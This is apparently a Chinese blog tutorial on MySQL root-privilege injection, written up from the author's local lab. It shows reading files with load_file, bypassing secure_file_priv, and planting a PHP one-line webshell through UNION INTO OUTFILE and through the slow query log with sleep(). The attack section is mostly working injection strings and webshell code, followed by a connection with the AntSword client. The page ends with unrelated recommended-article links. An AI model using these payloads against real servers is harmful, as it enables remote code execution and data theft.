sql 读写注入

root高权限读写注入

load_file 读取文件

大姐我真是整了半天都是nullnullnull缝子

结果看了半天这个my.ini是被隐藏的大哥

load_file()读取文件结果为null_mysql load_file返回null解决办法_黑小薛的博客-CSDN博客

终于读出来了

此时参数值系统变量 secure_file_priv已经被修改

原本此处变量值为 NULL,即没设置允许操作的目录,所以没法导出到文件。

这个变量就可以用来限制操作路径

into_outfile 写入文件

?param=0' union select 1,2,3,4,'a' into outfile 'e:/2.txt'--+

我们可以看到2.txt被写入

我们可以写入一句话木马

复制代码
?param=0' union select 1,2,3,4,'<?php eval($_POST[a]);?>' into outfile 'D:/phpstudy_pro/WWW/c.php'--+

先检查一下是否上传成功

用蚁剑发现连接成功了v

太搞笑了连接自己

那么如果把my.ini内的参数secure_file_priv设置在c盘目录下

复制代码
secure_file_priv=c:/

我们可以发现我们就只能在c盘进行操作

mysql写马

set global slow_query_log=1;

set global slow_query_log_file='D:\\phpstudy_pro\\WWW\d.php'

D:\\phpstudy_pro\\WWW\d.php---------》shell路径

可以看到有了d.php

复制代码
select '<?php eval($ POST[a])?>' or SLEEP(1);

但是!!!

我发现如果sleep的少,并不会记录到日志中去

要sleep的久一点

Mysql注入写Shell读文件总结 - FreeBuf网络安全行业门户

复制代码
select "<?php eval($_POST[aaaaaa]);?>" or sleep(11);

可以看一下我们的日志d.php

因为尝试了很多次。。所以有很多

我们可以发现都是sleep(11)的被记录了

蚁剑连一下看看

相关推荐
juniperhan1 分钟前
Flink 系列第21篇:Flink SQL 函数与 UDF 全解读:类型推导、开发要点与 Module 扩展
java·大数据·数据仓库·分布式·sql·flink
ID_180079054732 分钟前
Python 实现亚马逊商品详情 API 数据准确性校验(极简可用 + JSON 参考)
java·python·json
c++之路22 分钟前
C++23概述
java·c++·c++23
Elastic 中国社区官方博客41 分钟前
Elastic-caveman : 在不损失 Elastic 最佳效果的情况下,将 AI 响应 tokens 减少64%
大数据·运维·数据库·人工智能·elasticsearch·搜索引擎·全文检索
互联网推荐官1 小时前
上海软件定制开发全流程拆解:需求分析、技术选型与交付管理的工程实践
大数据·数据库·需求分析
专注API从业者1 小时前
Open Claw 京东商品监控选品实战:一键抓取、实时监控、高效选品
java·服务器·数据库
大迪deblog1 小时前
系统架构师-数据库-数据库设计
数据库·oracle·系统架构
leo__5202 小时前
IEC 104 协议 C 语言实现
c语言·数据库
摇滚侠2 小时前
DBeaver 导入数据库 导入 SQL 文件 MySQL 备份恢复
java·数据库·mysql
若兰幽竹2 小时前
【从零开始编写数据库系统:架构设计与实现】第5章:查询执行引擎与火山模型
数据库·架构·数据库内核·toydb